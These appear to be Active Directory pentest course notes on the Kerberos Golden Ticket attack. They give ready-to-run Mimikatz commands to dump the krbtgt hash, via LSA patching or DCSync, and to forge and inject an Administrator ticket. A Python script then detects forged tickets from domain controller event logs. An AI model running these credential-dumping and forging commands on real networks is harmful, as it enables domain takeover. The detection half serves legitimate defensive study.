Golden Ticket

A Golden Ticket is a forged TGT that is signed and encrypted with the hash (or AES key) of the krbtgt account, which is what makes the KDC accept it as a valid TGT.

A Golden Ticket can be used to impersonate any user with any privileges.

Obtain krbtgt hash

There are multiple ways to obtain the krbtgt account hash:

# Execute on DC as Domain Admin
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

# DCSync to get AES keys
# Needs Domain admin or Replication Rights
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Create The Ticket

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<domain_sid> /aes256:<aes_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

dir \\dcorp-dc\c$ # check whether the ticket works

Options

| Option | Description |
|---|---|
| kerberos::golden | Name of the module |
| /User:Administrator | Username for which the TGT is generated |
| /domain: | Domain FQDN |
| /sid: | SID of the domain |
| /aes256: | AES256 key of the krbtgt account |
| /id:500 /groups:512 | Optional user RID and group RIDs |
| /ptt or /ticket | ptt: inject the ticket into the current process; ticket: save the ticket to a file |
| /startoffset:0 | Optional. Offset in minutes from now at which the ticket becomes valid; use a negative value for a ticket valid from the past and a larger number for one valid in the future |
| /endin:600 | Optional ticket lifetime in minutes (default 10 years). The default AD setting is 10 hours = 600 minutes |
| /renewmax:10080 | Optional maximum ticket lifetime with renewal, in minutes (default 10 years). The default AD setting is 7 days = 10080 minutes |
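Because a forged TGT is never issued by the KDC, its use shows up on the domain controllers as service-ticket requests (event 4769) with no preceding TGT request (4768) from the same account and client, and the /endin and /renewmax defaults above bound how long ago a legitimate TGT must have been issued or renewed (event 4770). As an added example that is not part of the original notes, the Python below runs that check over constructed sample events; the event dictionaries, field names and window sizes are assumptions, and logs from all DCs must be centralised first because the 4768 and 4769 can land on different DCs.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs), already centralised from every DC.
# 4768 = TGT requested (AS-REQ), 4769 = service ticket requested (TGS-REQ),
# 4770 = ticket renewed. A forged TGT produces 4769s with no 4768 behind them.
SAMPLE_EVENTS = [
    {"time": "2024-05-01 00:00:00", "id": 4768, "account": "svc_backup",    "ip": "10.0.0.20"},
    {"time": "2024-05-01 08:00:00", "id": 4768, "account": "jdoe",          "ip": "10.0.0.15"},
    {"time": "2024-05-01 08:05:00", "id": 4769, "account": "jdoe",          "ip": "10.0.0.15"},
    {"time": "2024-05-01 09:10:00", "id": 4769, "account": "Administrator", "ip": "10.0.0.77"},
    {"time": "2024-05-01 09:12:00", "id": 4769, "account": "Administrator", "ip": "10.0.0.77"},
    {"time": "2024-05-01 11:00:00", "id": 4769, "account": "svc_backup",    "ip": "10.0.0.20"},
    {"time": "2024-05-01 15:00:00", "id": 4770, "account": "jdoe",          "ip": "10.0.0.15"},
    {"time": "2024-05-01 19:30:00", "id": 4769, "account": "jdoe",          "ip": "10.0.0.15"},
]

def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")

def find_tgs_without_tgt(events, max_tgt_lifetime_minutes=600):
    """Return the 4769 events whose (account, client IP) has no 4768 or 4770
    within the preceding window. 600 minutes is the AD default TGT lifetime;
    pass 10080 (the default renewal limit) to tolerate renewed tickets instead.
    The log window should cover at least the renewal limit, otherwise TGTs
    issued before collection started are flagged as well."""
    window = timedelta(minutes=max_tgt_lifetime_minutes)
    last_issue = {}   # (account, ip) -> time of the most recent 4768/4770
    flagged = []
    for event in sorted(events, key=_ts):
        key = (event["account"].lower(), event["ip"])
        now = _ts(event)
        if event["id"] in (4768, 4770):
            last_issue[key] = now
        elif event["id"] == 4769:
            issued = last_issue.get(key)
            if issued is None or now - issued > window:
                flagged.append(event)
    return flagged

if __name__ == "__main__":
    for hit in find_tgs_without_tgt(SAMPLE_EVENTS):
        print(f"{hit['time']} 4769 for {hit['account']} from {hit['ip']} has no TGT issuance in window")
```

On the sample data the two Administrator requests are flagged (no TGT was ever issued to that client) and so is svc_backup (its TGT is 11 hours old with no renewal), while jdoe's late request is covered by the 4770 renewal.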
